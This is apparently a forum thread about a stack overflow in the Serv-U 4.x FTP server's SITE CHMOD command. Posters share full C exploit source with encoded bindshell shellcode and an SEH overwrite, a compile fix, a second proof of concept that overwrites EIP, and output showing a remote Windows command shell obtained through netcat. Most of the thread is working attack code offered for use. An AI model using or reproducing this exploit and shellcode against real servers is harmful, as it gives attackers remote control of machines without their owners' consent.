[gsicht]

hm..., the eax register is overridden by the string but i can't achieve the eip. *grml* :(
maybe only it's a dosable vulnerability

[isaiah]

I bet someone already relased this but not sharing and thank god i use serv-u 5.0

[Divx_dude]

this exploit is LAME

[flashb4ck]

is there no way to exploit without to have write access because on the most server u have only read axx ?!=!?

[Viporizer]

Tryed it on my private server, and it worked. But now i have make it a server again, so it wasn't that smart of me... <_<

[pita]

here the exploit with shell

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq 0x557 org
* exp coded by mslug safechina net
* Jan 25 2004
*/

/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION - 
strlen(ERR_HEADER))

// bindshell shellcode from www.cnhonker.org
#define    PORT             53
#define    PORT_OFFSET      176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                      "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                      "\x33\xc0"         //below: xor eax, eax
                      "\xb0\x1c"         //mov al, 1c
                      "\x03\xd8"         //add ebx, eax
                      "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int main(int argc, char **argv)
{
   WSADATA wsa;
   unsigned short port;
   int ftpsock, ret;
   char recv_buf[1000];
   unsigned long     ip;
   unsigned char buf[100];

   printf("*******************************************\n");
   printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
   printf("* Vul discovered by kkqq 0x557 org        *\n");
   printf("* Coded by mslug safechina net            *\n");
   printf("*******************************************\n");
   printf("\n");

   if(argc<6) {
      printf("serv.exe <host> <port> <user> <password> <path>\n");
      return 0;
   }

   WSAStartup(MAKEWORD(2,2), &wsa);

   port = htons(PORT)^(USHORT)0x9999;
   memcpy(&bdshellcode[PORT_OFFSET], &port, 2);


   ftpsock = connect_tcp(argv[1], atoi(argv[2]));
   if(ftpsock < 0) {
      printf("[-] Connection refused\n");
      return 0;
   }
   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

   recv_buf[ret] = 0;
   printf("%s", recv_buf);


   sprintf(buf, "USER %s\r\n", argv[3]);
   send(ftpsock, buf, strlen(buf), 0);

   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

   recv_buf[ret] = 0;
   printf("%s", recv_buf);

   sprintf(buf, "PASS %s\r\n", argv[4]);
   send(ftpsock, buf, strlen(buf), 0);

   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
   printf("%s", recv_buf);

   sprintf(buf, "CWD %s\r\n", argv[5]);
   send(ftpsock, buf, strlen(buf), 0);

   ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
   recv_buf[ret] = 0;
   printf("%s", recv_buf);

   memset(evil_chmod, 0x90, sizeof(evil_chmod));
   memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
   memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
   memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20], 
bdshellcode, strlen(bdshellcode));

   send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

   printf("[+] Shellcode sent\n");
   printf("[+] Now nc to port 53\n");

   closesocket(ftpsock);
   WSACleanup();

   return 0;
}

int connect_tcp(char *host, int port)
{
   struct hostent *rhost;
   struct sockaddr_in sin_rhost;
   unsigned long ip_rhost;
   int sock;

   memset(&sin_rhost, 0, sizeof(sin_rhost));

   sin_rhost.sin_family = AF_INET;
   sin_rhost.sin_port = htons(port);
   ip_rhost = inet_addr(host);
   if(ip_rhost==INADDR_NONE) {
      rhost = gethostbyname(host);
      if(rhost==0) return -1;
      ip_rhost = *(unsigned long*)rhost->h_addr;
   }

   sin_rhost.sin_addr.s_addr = ip_rhost;

   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if(sock<0) {
      return -1;
   }

   if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
      return -1;
   }

   return sock;
}

[x1`]

nice one m8 did u test it ? also which compiler did u use

[BlackBoard]

serv-u 4.2 site chmod long_file_name stack overflow exp

$ gcc servu.c
servu.c:19: error: syntax error before string constant
servu.c: In function `main':
servu.c:93: error: `bdshellcode' undeclared (first use in this function)
servu.c:93: error: (Each undeclared identifier is reported only once
servu.c:93: error: for each function it appears in.)
servu.c:131: error: syntax error before ']' token
servu.c:132: error: syntax error before ']' token
servu.c:176:2: warning: no newline at end of file

[TheOther]

I use ms CC++:


Compiling...
servExploit.c
c:\servexploit.c(18) : error C2143: syntax error : missing ')' before 'string'
c:\servexploit.c(18) : error C2143: syntax error : missing '{' before 'string'
c:\servexploit.c(18) : error C2059: syntax error : '<Unknown>'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(92) : error C2065: 'bdshellcode' : undeclared identifier
c:\servexploit.c(92) : error C2109: subscript requires array or pointer type
c:\servexploit.c(92) : error C2102: '&' requires l-value
c:\servexploit.c(92) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(92) : error C2198: 'memcpy' : too few actual parameters
c:\servexploit.c(95) : warning C4013: 'connect_tcp' undefined; assuming extern returning int
c:\servexploit.c(130) : error C2059: syntax error : ']'
c:\servexploit.c(131) : error C2143: syntax error : missing ')' before ']'
c:\servexploit.c(132) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(132) : warning C4047: 'function' : 'const char *' differs in levels of indirection from 'int '
c:\servexploit.c(132) : warning C4024: 'strlen' : different types for formal and actual parameter 1

[easternerd]

Yes the cj team released it..
but they told us not to get it
to open :(...

[DeathDriver]

i had no problems with compiling. i did it with borlad c++builderX

the only think i had to do was interting "int connect_tcp(char *host, int port);"

above

"int main(int argc, char **argv)"

the result is:

//...
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                     "\x33\xc0"         //below: xor eax, eax
                     "\xb0\x1c"         //mov al, 1c
                     "\x03\xd8"         //add ebx, eax
                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int connect_tcp(char *host, int port);

int main(int argc, char **argv)
{
  WSADATA wsa;
  unsigned short port;
  int ftpsock, ret;
//...

after compiling i tried it with my servu server, but she server just shut down. may be i have do disable my firewall. or i did an other mistake...

[gsicht]

Quote

this exploit is LAME

it's a dos exploit! pita coded this exploit to show that there's a stack overflow in servu. thanks to pita
i just found the place where the eip is. i'll try to code a working exploit. you can help me if you will.

here is an example how to overwrite the eip

/*
 * the XXXX in buff[] is the return address
 * gsicht
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>


char buff[] =	"SITE CHMOD 777 "
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAXXXXAAAAAAAAAAAA"
  "AAAAAAAAAAAAAAA\r\n";


int main(int argc, char *argv[])
{

 struct sockaddr_in target;
 struct sockaddr_in test;
 int s, i;
 char buffer[1000];
 char user[50];
 char pass[50];
 char empf_buffer[1024];

 sprintf(user,"USER %s\r\n",argv[3]);
 sprintf(pass,"PASS %s\r\n",argv[4]);

 printf("\n----- hier ist die topic -----\n");

 if(argc < 4)
 {
  printf("\nUsage:\t%s <host> <port> <user> <pass>\n\n",argv[0]);
  exit(-1);
 }

 s=socket(AF_INET,SOCK_STREAM,0);
 
 target.sin_family = AF_INET;
 target.sin_port = htons(atoi(argv[2]));
 target.sin_addr.s_addr = inet_addr(argv[1]);

 printf("\n- connecting...\n");

 if (connect (s, (struct sockaddr *) &target, sizeof(target)) == -1)
 {
  printf("  could not connect!\n");
  exit(-1);
 }
 printf("  connected\n");

 printf("- user\t%s\n",argv[3]);
 printf("- pass\t%s\n",argv[4]);
 write(s,user,strlen(user));
 sleep(1);
 write(s,pass,strlen(pass)); 
 sleep(1);

 i=recv(s,empf_buffer,sizeof(empf_buffer),0);
 empf_buffer[i]='\0';

 if(strstr(empf_buffer,"230")!=NULL )
 {
  printf("  user logged in\n");
  sleep(1);
 }
 else
 {
  printf("  wrong username or password!\n");
  exit(-1);
 }


 printf("- sending %d bytes\n",strlen(buff));
 write(s,buff,strlen(buff));
 sleep(1);
 printf("- done\n");
 close(s);

 return 0;
}

[gsicht]

oh, i didn't saw the exploit from 0x557 :D
forget my post

[temp]

works great..

Z:\servu\Release>cpp1 192.168.0.10 21 test test /
*******************************************
* Serv-U 4.2 site chmod stack overflow exp*
* Vul discovered by kkqq 0x557 org *
* Coded by mslug safechina net *
*******************************************

220 Serv-U FTP Server v4.1 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
250 Directory changed to /
[+] Shellcode sent
[+] Now nc to port 53

Z:\servu\Release>z:\nc 192.168.0.10 53

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\>